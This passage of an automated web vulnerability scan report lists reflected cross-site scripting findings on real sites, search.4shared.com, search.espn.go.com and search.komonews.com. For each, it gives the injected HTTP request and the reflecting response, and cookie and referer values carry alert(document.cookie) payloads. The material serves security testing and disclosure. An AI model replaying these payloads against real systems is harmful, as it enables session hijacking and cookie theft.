Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css81082"-alert(1)-"fa1a66483cf/common.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css81082&quot;-alert(1)-&quot;fa1a66483cf/common.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:11 GMT
Content-Length: 36953


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css81082"-alert(1)-"fa1a66483cf/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.159. http://search.4shared.com/css/common.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2823d"-alert(1)-"5c1c5cba9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css2823d"-alert(1)-"5c1c5cba9a2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/common.css2823d&quot;-alert(1)-&quot;5c1c5cba9a2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:12 GMT
Content-Length: 36964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/common.css2823d"-alert(1)-"5c1c5cba9a2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.160. http://search.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89bb8"-alert(1)-"0465f9b3ed8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css89bb8"-alert(1)-"0465f9b3ed8/main.css?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css89bb8&quot;-alert(1)-&quot;0465f9b3ed8/main.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:11:58 GMT
Content-Length: 36943


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css89bb8"-alert(1)-"0465f9b3ed8/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.161. http://search.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 860a4"-alert(1)-"28ebbe0199e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css860a4"-alert(1)-"28ebbe0199e?ver=1610 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/main.css860a4&quot;-alert(1)-&quot;28ebbe0199e
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 20:12:10 GMT
Content-Length: 36944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/main.css860a4"-alert(1)-"28ebbe0199e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.162. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3880"-alert(1)-"5bdfa9fe7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /cssa3880&quot;-alert(1)-&quot;5bdfa9fe7b5/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:02:04 GMT
Content-Length: 37008


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/cssa3880"-alert(1)-"5bdfa9fe7b5/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.163. http://search.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f80"-alert(1)-"11bae875e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /css/mainWithoutCommon.css63f80&quot;-alert(1)-&quot;11bae875e74
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:03:50 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/css/mainWithoutCommon.css63f80"-alert(1)-"11bae875e74";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.164. http://search.4shared.com/js/utils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36042"-alert(1)-"1c581c8364b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js36042"-alert(1)-"1c581c8364b/utils.js HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js36042&quot;-alert(1)-&quot;1c581c8364b/utils.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:04:09 GMT
Content-Length: 36240


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js36042"-alert(1)-"1c581c8364b/utils.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.165. http://search.4shared.com/js/utils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0040"-alert(1)-"c8a96e2acb2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/utils.jsf0040"-alert(1)-"c8a96e2acb2 HTTP/1.1
Host: search.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; hostid=1510122214; search.view2=ls

Response

HTTP/1.1 404 /js/utils.jsf0040&quot;-alert(1)-&quot;c8a96e2acb2
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 02:07:06 GMT
Content-Length: 36251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://search.4shared.com/js/utils.jsf0040"-alert(1)-"c8a96e2acb2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.166. http://search.4shared.com/search.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.4shared.com
Path:   /search.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ef9a6--><script>alert(1)</script>310e4e7016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search.html?ef9a6--><script>alert(1)</script>310e4e7016=1 HTTP/1.1
Host: search.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: hostid=1214903107; Expires=Sat, 20-Feb-2021 23:05:47 GMT; Path=/
Set-Cookie: search.view2=ls; Domain=.4shared.com; Expires=Thu, 23-Feb-2012 23:05:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:05:47 GMT
Connection: close
Content-Length: 97304


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>
...[SNIP]...
<!-- params: {searchName=, ef9a6--><script>alert(1)</script>310e4e7016=1, start=0} -->
...[SNIP]...

1.167. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 337fb<script>alert(1)</script>c9bcf2da6ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8337fb<script>alert(1)</script>c9bcf2da6ef/suggestions</BODY></HTML>

1.168. http://search.espn.go.com/s/ie8/suggestions [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /s/ie8/suggestions

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5dae3<script>alert(1)</script>2ed2625dccf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf?q={searchTerms} HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 139
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6

<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/s/ie8/suggestions5dae3<script>alert(1)</script>2ed2625dccf</BODY></HTML>

1.169. http://search.komonews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 828f5"><script>alert(1)</script>39ab8bcd49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?828f5"><script>alert(1)</script>39ab8bcd49a=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&828f5%22%3e%3cscript%3ealert(1)%3c%2fscript%3e39ab8bcd49a=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59417
Set-Cookie: .ASPXANONYMOUS=CMDHFEAKzAEkAAAAY2U0MzNhZmYtZGUxZi00YTI5LWFlNzQtYzcyYjQzY2M2MWFiZBs8uVr2lxQ8LA9daCyY3ENgMo01; expires=Wed, 04-May-2011 09:46:02 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:02 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:02 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>KOMO News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   <m
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="KOMO News Updates" href="http://search.komonews.com/default.aspx?ct=r&828f5"><script>alert(1)</script>39ab8bcd49a=1&ename=rsspage" />
...[SNIP]...

1.170. http://search.komonews.com/Boeing [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.komonews.com
Path:   /Boeing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5871d"><script>alert(1)</script>471bc5d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Boeing?5871d"><script>alert(1)</script>471bc5d854b=1 HTTP/1.1
Host: search.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
SS-InternalUrl: ct=r&type=20245,90000063&5871d%22%3e%3cscript%3ealert(1)%3c%2fscript%3e471bc5d854b=1
SS-UserId: 00000000-0000-0000-0000-000000000000
SS-IsAnonymous: 1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48506
Set-Cookie: .ASPXANONYMOUS=v2zMF0AKzAEkAAAAMjBjMTQyZTUtOTMxNi00NmI4LWIwMzUtMTM3OTI0Zjc1NTE3qQuSrY5MTFyMezLzfacF0LvtraM1; expires=Wed, 04-May-2011 09:46:08 GMT; path=/; HttpOnly
Set-Cookie: sess_nopops=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_new=1; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_ct=0; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Set-Cookie: sess_last=2/23/2011 3:06:08 PM; domain=.search.komonews.com; expires=Thu, 23-Feb-2012 23:06:08 GMT; path=/
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Boeing News</title>
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
...[SNIP]...
